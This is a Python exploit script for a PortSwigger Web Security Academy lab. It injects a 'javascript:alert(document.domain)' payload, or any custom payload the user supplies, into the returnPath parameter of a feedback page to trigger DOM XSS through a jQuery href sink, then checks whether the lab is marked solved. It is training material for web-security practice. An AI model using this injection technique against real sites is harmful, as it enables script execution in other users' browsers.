#!/usr/bin/env python3
import argparse
import sys

import requests
import urllib3
from bs4 import BeautifulSoup
from colorama import Fore, Style
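# ignores InsecureRequestWarning - comment out if want warning
# See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# All traffic is relayed through a local intercepting proxy on 127.0.0.1:8080
# so the exchange can be inspected. TLS verification is turned off on every
# request below for the same reason: the proxy presents its own certificate
# for the lab host (assumption — confirm against your proxy's CA setup).
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Text the lab banner shows once the lab is marked as solved.
SUCCESS_TEXT = "Congratulations, you solved the lab!"


def build_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for ``-u/--url`` and ``-p/--payload``."""
    parser = argparse.ArgumentParser(description='This is a script to exploit DOM XSS in jQuery anchor href attribute sink using location.search source in the PortSwigger Web Security Lab.')
    # -u | --url URL
    parser.add_argument(
        '-u',
        '--url',
        metavar='url',
        type=str,
        default='',
        nargs='?',
        help='your lab url, make sure to include the / at the end - example: ./exploit.py -u https://YOUR-LAB-ID.web-security-academy.net/'
    )
    # -p | --payload Your custom payload (optional)
    parser.add_argument(
        '-p',
        '--payload',
        metavar='payload',
        type=str,
        nargs='?',
        default='javascript:alert(document.domain)',
        help='your custom payload (optional) default: javascript:alert(document.domain)'
    )
    return parser


def _get(url: str) -> requests.Response:
    """GET ``url`` through the configured proxy, exiting with status 1 on failure.

    A ``ProxyError`` (proxy not listening) and any other ``RequestException``
    (DNS, connection, timeout, ...) are reported in colour instead of
    surfacing as a traceback.
    """
    try:
        return requests.get(url, verify=False, proxies=proxies)
    except requests.exceptions.ProxyError as err:
        # proxy check
        print(
            f'{Fore.RED}[*]{Style.BRIGHT} Check your proxy.. is it open?{Style.RESET_ALL}')
        print(
            f'{Fore.RED}[*]{Style.BRIGHT} Error Message:{Style.RESET_ALL} {err}')
        sys.exit(1)
    except requests.exceptions.RequestException as err:
        print(
            f'{Fore.RED}[*]{Style.BRIGHT} Request failed:{Style.RESET_ALL} {err}')
        sys.exit(1)


def main() -> None:
    """Send the payload to the lab's feedback page, then check for the solved banner.

    Exits with status 1 when no lab URL was supplied, the request cannot be
    delivered, or the feedback page does not answer 200.
    """
    parser = build_parser()
    args = parser.parse_args()

    # ``nargs='?'`` makes ``-u`` with no value yield None; the default is ''.
    if not args.url:
        # print_help() writes to stdout itself and returns None — do not print its result.
        parser.print_help()
        sys.exit(1)

    # The help text asks for a trailing slash; normalise so a missing one does
    # not silently produce '...netfeedback?...'.
    base_url = args.url.rstrip('/') + '/'
    payload = args.payload
    exploit_url = base_url + 'feedback?returnPath=' + payload

    resp = _get(exploit_url)
    if resp.status_code != 200:
        print(f'{Fore.RED}[!] HTTP status code of {resp.status_code} returned, but 200 was expected. Exiting... {Style.RESET_ALL}')
        sys.exit(1)

    # The lab home page carries the solved/not-solved banner.
    resp_success = _get(base_url)
    soup = BeautifulSoup(resp_success.content, 'html.parser')
    success_message = soup.find(string=SUCCESS_TEXT)

    if success_message:
        print(f'[{Fore.GREEN}*{Style.RESET_ALL}] You Sent: {resp.url}')
        print('---')
        print(f'[{Fore.GREEN}*{Style.RESET_ALL}] You Received: {success_message}')
        print('---')
    else:
        print('---')
        print(f'[*] You sent: {resp.url}')
        print('---')
        print(f'[{Fore.RED}!{Style.RESET_ALL}] Try again')
        print('---')
        print('[*] Want to see more? Check your proxy & browser 🫥')


if __name__ == '__main__':
    main()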